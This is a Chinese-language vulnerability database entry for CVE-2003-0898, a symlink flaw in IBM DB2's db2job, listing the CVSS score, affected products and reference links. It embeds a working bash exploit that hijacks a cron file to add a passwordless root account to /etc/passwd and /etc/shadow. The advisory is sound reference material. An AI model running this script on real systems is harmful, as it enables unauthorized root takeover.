CVE-2003-0898
CVSS4.6
发布时间 :2003-11-17 00:00:00
修订时间 :2016-10-17 22:38:14
NMCOE    

[原文]IBM DB2 7.2 before FixPak 10a, and earlier versions including 7.1, allows local users to overwrite arbitrary files and gain privileges via a symlink attack on (1) db2job and (2) db2job2.


[CNNVD]FixPak覆盖任意文件漏洞(CNNVD-200311-067)

        IBM DB2 7.2 FixPak 10a之前的版本,及包括7.1的早期版本存在漏洞。本地用户借助对(1) db2job 和(2)db2job2的符号链接攻击覆盖任意文件。

- CVSS (基础分值)

CVSS分值: 4.6 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:ibm:db2_universal_database:7.1::linux
cpe:/a:ibm:db2_universal_database:8.0::linuxIBM DB2 Universal Database 8.0 linux

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0898
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0898
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200311-067
(官方数据源) CNNVD

- 其它链接及资源

ftp://ftp.software.ibm.com/ps/products/db2/fixes/english-us/db2aixv7/FP10a_U495172/FixpakReadme.txt
(UNKNOWN)  CONFIRM  ftp://ftp.software.ibm.com/ps/products/db2/fixes/english-us/db2aixv7/FP10a_U495172/FixpakReadme.txt
http://marc.info/?l=bugtraq&m=106010332721672&w=2
(UNKNOWN)  BUGTRAQ  20030805 Local Vulnerability in IBM DB2 7.1 db2job binary

- 漏洞信息

FixPak覆盖任意文件漏洞
中危 未知
2003-11-17 00:00:00 2005-10-20 00:00:00
本地  
        IBM DB2 7.2 FixPak 10a之前的版本,及包括7.1的早期版本存在漏洞。本地用户借助对(1) db2job 和(2)db2job2的符号链接攻击覆盖任意文件。

- 公告与补丁

        

- 漏洞信息 (22988)

IBM DB2 db2job File Overwrite Vulnerability (EDBID:22988)
unix local
2003-08-05 Verified
0 Juan Manuel Pascual Escribá
N/A [点击下载]
source: http://www.securityfocus.com/bid/8344/info

IBM's DB2 database ships with a utility called db2job, installed with permissions 4550 and owned by root.db2asgrp. 

It has been reported that db2job writes to a number of files with root privileges. The files written to are created with 0770 permissions (owner, group writeable) and are owned by root.db2asgrp. If a symbolic link is written to, the file pointed to will be overwritten and given these permissions. This can be exploited by local attackers with execute privileges to gain root access by writing malicious data to sensitive files (such as /etc/passwd, /etc/shadow) that have been overwritten.

It should be noted, however, that db2job is allegedly not world-executable by default. The two members of group db2asgrp, db2as and db2inst1, are the only users besides root that would normally have execute access. If the attacker can run commands or gain the access level of those accounts, they may further elevate their access level through exploitation of this vulnerability.

#!/bin/bash

DB2JOB=/home/db2as/sqllib/adm/db2job
CRONFILE=/etc/cron.hourly/pakito
USER=pakito

unset DB2INSTANCE
export DB2DIR=./trash

if [ -d $DB2DIR ]; then
echo Trash directory already created
else
mkdir $DB2DIR
fi

cd $DB2DIR
if [ -f ./0_1.out ]; then
echo Link Already Created
else
ln -s $CRONFILE ./0_1.out
fi

$DB2JOB


echo "echo "#!/bin/bash"" > $CRONFILE
echo "echo "$USER:x:0:0::/:/bin/bash" >> /etc/passwd" >> $CRONFILE
echo "echo "$USER::12032:0:99999:7:::" >> /etc/shadow" >> $CRONFILE
echo " must wait until cron execute $CRONFILE and then exec su pakito"		

- 漏洞信息

9492
IBM DB2 db2job Symlink Privilege Escalation
Local Access Required Race Condition

- 漏洞描述

Unknown or Incomplete

- 时间线

2003-08-05 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站